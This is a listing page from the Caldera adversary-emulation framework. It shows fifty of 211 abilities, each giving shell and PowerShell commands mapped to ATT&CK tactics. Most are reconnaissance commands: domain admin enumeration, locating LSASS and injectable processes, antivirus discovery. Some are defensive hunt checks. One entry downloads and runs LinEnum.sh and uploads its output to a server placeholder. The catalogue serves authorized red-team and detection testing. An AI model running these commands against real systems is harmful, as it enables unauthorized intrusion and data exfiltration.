Caldera emulation abilities
211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics (ability count per tactic):
build-capabilities · 1
collection · 16
command-and-control · 6
credential-access · 10
defense-evasion · 15
detection · 8
discovery · 67
execution · 9
exfiltration · 13
hunt · 4
impact · 8
lateral-movement · 10
persistence · 3
privilege-escalation · 8
response · 14
setup · 10
technical-information-gathering · 1
training · 6
verification · 2

Abilities
50 shown of 211

Find unauthorized processes
Search for processes which should not be on the host
[{"platform": "darwin", "executor": "sh", "command": "ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'\n"}, {"platform": "linux", "executor": "sh", "command": "ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-NetTCPConnection -RemotePort \"#{remote.port.unauthorized}\" -EA silentlycontinue | where-object { write-host $_.OwningProcess }\n"}]

Modified Sensitive Directory
Checks sensitive directory hashes against previously stored hashes to determine if the directory has been modified
[{"platform": "linux", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nif [ -d $directory ];\n then tar -czf /tmp/dir_sens_comp -C $directory .;\n hash=$(sha256sum /tmp/dir_sens_comp | cut -d' ' -f1);\n rm -f /tmp/dir_sens_comp;\n if [ \"$hash\" != \"#{directory.sensitive.hash}\" ];\n then echo $directory;\n fi;\nelse echo $directory;\nfi;\n"}, {"platform": "darwin", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nif [ -d $directory ];\n then tar -cf - -C $directory . | gzip --no-name > /tmp/dir_sens_comp;\n hash=$(shasum -a 256 /tmp/dir_sens_comp | cut -d' ' -f1);\n rm -f /tmp/dir_sens_comp;\n if [ \"$hash\" != \"#{directory.sensitive.hash}\" ];\n then echo $directory;\n fi;\nelse echo $directory;\nfi;\n"}, {"platform": "windows", "executor": "psh", "command": "$directory = \"#{directory.sensitive.path}\";\nif (Test-Path -PathType Container $directory) {\n Compress-Archive -Force -Path $($directory + \"\\*\") -DestinationPath C:\\Users\\Public\\dir_sens_comp.zip;\n $hash = (Get-FileHash C:\\Users\\Public\\dir_sens_comp.zip).Hash;\n Remove-Item -Force C:\\Users\\Public\\dir_sens_comp.zip;\n if ($hash -ne \"#{directory.sensitive.hash}\") {\n echo $directory;\n }\n} else {\n echo $directory;\n}\n"}]

Modified Sensitive Files
Checks sensitive file hashes against previously stored hashes to determine if the file has been modified
[{"platform": "linux", "executor": "sh", "command": "filepath=\"#{file.sensitive.path}\";\nif [ ! -f $filepath ] || [ \"$(sha256sum $filepath | cut -d' ' -f1)\" != \"#{file.sensitive.hash}\" ];\n then echo $filepath;\nfi\n"}, {"platform": "darwin", "executor": "sh", "command": "filepath=\"#{file.sensitive.path}\";\nif [ ! -f $filepath ] || [ \"$(shasum -a 256 $filepath | cut -d' ' -f1)\" != \"#{file.sensitive.hash}\" ];\n then echo $filepath;\nfi\n"}, {"platform": "windows", "executor": "psh", "command": "if (-not (Test-Path -PathType Leaf #{file.sensitive.path}) -or (Get-FileHash #{file.sensitive.path}).Hash -ne \"#{file.sensitive.hash}\") { echo #{file.sensitive.path} }\n"}]

New Cron Jobs
Checks to see if a new (unauthorized) cron job has been added
[{"platform": "linux", "executor": "sh", "command": "set -f;\nfor user in $(getent passwd | cut -f1 -d:); do\n $(crontab -u $user -l 2>/dev/null | grep -v '\\#' | while read -r job; do\n echo \"${user}>${job}\" >> /tmp/cron_jobs;\n done);\ndone;\ncat /tmp/cron_jobs | sort > /tmp/new_cronjobs_list.txt;\nnew_jobs=$(comm -13 /tmp/baseline_cronjobs_list.txt /tmp/new_cronjobs_list.txt);\nrm -f /tmp/cron_jobs;\nrm -f /tmp/new_cronjobs_list.txt;\nIFS=$(echo '\\n');\necho $new_jobs;\n"}, {"platform": "darwin", "executor": "sh", "command": "set -f;\nfor user in $(dscl . list /Users | grep -v \"^_\"); do\n $(crontab -u $user -l 2>/dev/null | grep -v '\\#' | while read -r job; do\n echo \"${user}>${job}\" >> /tmp/cron_jobs;\n done);\ndone;\ncat /tmp/cron_jobs | sort > /tmp/new_cronjobs_list.txt;\nnew_jobs=$(comm -13 /tmp/baseline_cronjobs_list.txt /tmp/new_cronjobs_list.txt);\nrm -f /tmp/cron_jobs;\nrm -f /tmp/new_cronjobs_list.txt;\nIFS=$(echo '\\n');\necho $new_jobs;\n"}]

New Scheduled Tasks
Checks to see if a new (unauthorized) scheduled task has been added
[{"platform": "windows", "executor": "psh", "command": "Get-ScheduledTask > C:\\Users\\Public\\new_schtasks_list.txt;\n$new_schtasks = $(Get-Content .\\new_schtasks_list.txt) | Where-Object {$_ -notIn $(Get-Content .\\baseline_schtasks_list.txt)} |foreach-object {(-split $_)[1]};\nRemove-Item -Path C:\\Users\\Public\\new_schtasks_list.txt -Force;\n$new_schtasks\n"}]

Suspicious URLs in mail
Finds suspicious URLs in received mail
[{"platform": "linux", "executor": "sh", "command": "find /var/mail -type f -exec grep \"From.*@.*\\..*\" {} \\; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq\n"}, {"platform": "darwin", "executor": "sh", "command": "find /var/mail -type f -exec grep \"From.*@.*\\..*\" {} \\; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq\n"}]

Account Discovery (all)
The net utility is executed via cmd to enumerate domain user accounts.
[{"platform": "windows", "executor": "cmd", "command": "net user /domain"}]

Account Discovery (targeted)
The net utility is executed via cmd to enumerate detailed information about a specific user account.
[{"platform": "windows", "executor": "cmd,psh", "command": "net user #{domain.user.name} /domain"}]

Account-type Admin Enumerator
Use PowerView to query the Active Directory server to determine remote admins
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n"}]

Application Window Discovery
Extracts the names of all open non-explorer windows, and the locations of all explorer windows.
[{"platform": "windows", "executor": "psh", "command": "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)"}]

Check Chrome
Check to see if the Google Chrome browser is installed
[{"platform": "darwin", "executor": "sh", "command": "which google-chrome\n"}, {"platform": "linux", "executor": "sh", "command": "which google-chrome\n"}]

Check Go
Check to see if GoLang is installed
[{"platform": "darwin", "executor": "sh", "command": "which go\n"}, {"platform": "linux", "executor": "sh", "command": "which go\n"}]

Check Python
Check to see what version of Python is installed
[{"platform": "darwin", "executor": "sh", "command": "python3 --version;python2 --version;python --version\n"}, {"platform": "linux", "executor": "sh", "command": "python3 --version;python2 --version;python --version\n"}, {"platform": "windows", "executor": "cmd", "command": "python3 --version&python2 --version&python --version\n"}]

Collect ARP details
Locate all active IPs and FQDNs on the network
[{"platform": "darwin", "executor": "sh", "command": "arp -a"}, {"platform": "linux", "executor": "sh", "command": "arp -a"}, {"platform": "windows", "executor": "psh,cmd", "command": "arp -a"}]

Current User
Obtain user from current session
[{"platform": "darwin", "executor": "sh", "command": "whoami\n"}, {"platform": "linux", "executor": "sh", "command": "whoami\n"}, {"platform": "windows", "executor": "psh", "command": "whoami\n"}]

Discover Domain Admins
Use PowerView to query the Active Directory server to determine remote admins
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n"}]

Discover Mail Server
Identify the organization's mail server
[{"platform": "linux", "executor": "sh", "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev"}, {"platform": "darwin", "executor": "sh", "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev"}, {"platform": "windows", "executor": "psh", "command": "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n"}]

Discover antivirus programs
Identify AV
[{"platform": "darwin", "executor": "sh", "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n"}, {"platform": "windows", "executor": "psh", "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n"}]

Discover domain controller
Identify the remote domain controllers
[{"platform": "windows", "executor": "cmd", "command": "nltest /dsgetdc:%USERDOMAIN%\n"}, {"platform": "windows", "executor": "psh", "command": "nltest /dsgetdc:$env:USERDOMAIN\n"}]

Discover injectable process
Discovers processes that the current user has the ability to access and selects an injectable one
[{"platform": "windows", "executor": "psh", "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n"}]

Discover local hosts
Use PowerView to query the Active Directory server for a list of computers in the Domain
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n"}]

Discover system services
Identify system services
[{"platform": "windows", "executor": "psh", "command": "Get-Service"}]

File and Directory Discovery
Find or discover files on the file system
[{"platform": "windows", "executor": "psh", "command": "Get-ChildItem -Path #{host.system.path}\n"}]

Find Domain
Find Domain information
[{"platform": "windows", "executor": "psh", "command": "nbtstat -n\n"}]

Find Hostname
Find hostname of remote host
[{"platform": "windows", "executor": "psh", "command": "nbtstat -A #{remote.host.ip}"}]

Find LSASS
Get process info for LSASS
[{"platform": "windows", "executor": "psh", "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n"}, {"platform": "windows", "executor": "cmd", "command": ""}]

Find OS Version
Find OS Version
[{"platform": "windows", "executor": "psh", "command": "[environment]::OSVersion.Version\n"}]

Find System Network Connections
Find System Network Connections
[{"platform": "darwin", "executor": "sh", "command": "netstat -anto\n"}, {"platform": "linux", "executor": "sh", "command": "netstat -anto\n"}, {"platform": "windows", "executor": "psh", "command": "netstat -anto;\nGet-NetTCPConnection\n"}]

Find deletable dirs (per user)
Discover all directories containing deletable files by user
[{"platform": "darwin", "executor": "sh", "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n"}]

Find local users
Get a list of all local users
[{"platform": "darwin", "executor": "sh", "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n"}, {"platform": "linux", "executor": "sh", "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n"}]

Find user processes
Get process info for processes running as a user
[{"platform": "darwin", "executor": "sh", "command": "ps aux | grep #{host.user.name}\n"}, {"platform": "linux", "executor": "sh", "command": "ps aux | grep #{host.user.name}\n"}, {"platform": "windows", "executor": "psh", "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n"}]

Fingerprint network services
Uses nmap to fingerprint services that were network accessible
[{"platform": "darwin", "executor": "sh", "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n"}, {"platform": "linux", "executor": "sh", "command": "nmap -sV -p #{remote.host.port} #{remote.host.ip}\n"}]

Get Chrome Bookmarks
Get Chrome Bookmarks
[{"platform": "darwin", "executor": "sh", "command": "cat ~/Library/Application\\ Support/Google/Chrome/Default/Bookmarks\n"}]

Get System Time
Get current system time (ISO 8601)
[{"platform": "darwin", "executor": "sh", "command": "date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n"}, {"platform": "linux", "executor": "sh", "command": "date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n"}, {"platform": "windows", "executor": "psh", "command": "Get-Date -UFormat '+%Y-%m-%dT%H:%M:%SZ'\n"}]

GetAdminMembers
Get Administrator users for a computer
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n"}]

GetComputers (Alice)
Get a list of all computers in a domain
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n"}]

GetDomain
Determine the Windows Domain of a computer
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n"}]

GetServiceAccounts
Get Service Accounts for a domain
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n"}]

Identify Firewalls
Identify Firewalls
[{"platform": "windows", "executor": "psh", "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n"}]

Identify active user
Find user running agent
[{"platform": "darwin", "executor": "sh", "command": "whoami"}, {"platform": "linux", "executor": "sh", "command": "whoami"}, {"platform": "windows", "executor": "psh", "command": "$env:username\n"}, {"platform": "windows", "executor": "cmd", "command": "echo %username%"}]

Identify local users
Identify all local users
[{"platform": "darwin", "executor": "sh", "command": "dscl . list /Users | grep -v '_'\n"}, {"platform": "windows", "executor": "psh", "command": "Get-WmiObject -Class Win32_UserAccount\n"}]

Internet Explorer Version
Determine the version of Internet Explorer running
[{"platform": "windows", "executor": "psh", "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n"}]

Linux Enumeration & Privilege Escalation Discovery Script
Download and execute LinEnum.sh
[{"platform": "linux", "executor": "sh", "command": "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n"}]

List Directory
List contents of current directory
[{"platform": "darwin", "executor": "sh", "command": "ls\n"}, {"platform": "linux", "executor": "sh", "command": "ls\n"}, {"platform": "windows", "executor": "psh", "command": "dir\n"}]
Local FQDN
Uses windows libraries to get FQDN of infected host
[]

Locate file from printer queue
Locate file that appears in the printer queue
[{"platform": "linux", "executor": "sh", "command": "find ~ -type f -name #{host.print.file} 2>/dev/null"}, {"platform": "darwin", "executor": "sh", "command": "find ~ -type f -name #{host.print.file} 2>/dev/null"}]

Network Interface Configuration
View network configuration info for host
[{"platform": "darwin", "executor": "sh", "command": "sudo ifconfig\n"}, {"platform": "linux", "executor": "sh", "command": "sudo ifconfig\n"}, {"platform": "windows", "executor": "psh", "command": "ipconfig\n"}]

Network Service Scanning
Scans the local network for common open ports
[{"platform": "windows", "executor": "psh", "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n"}]

Parse SSH known_hosts
View the known_hosts file
[{"platform": "darwin", "executor": "sh", "command": "cat ~/.ssh/known_hosts\n"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.ssh/known_hosts\n"}]

Password Policy
Password Policy Discovery
[{"platform": "darwin", "executor": "sh", "command": "pwpolicy getaccountpolicies\n"}, {"platform": "linux", "executor": "sh", "command": "cat /etc/pam.d/common-password\n"}, {"platform": "windows", "executor": "psh", "command": "net accounts"}]

Showing 51-100 of 211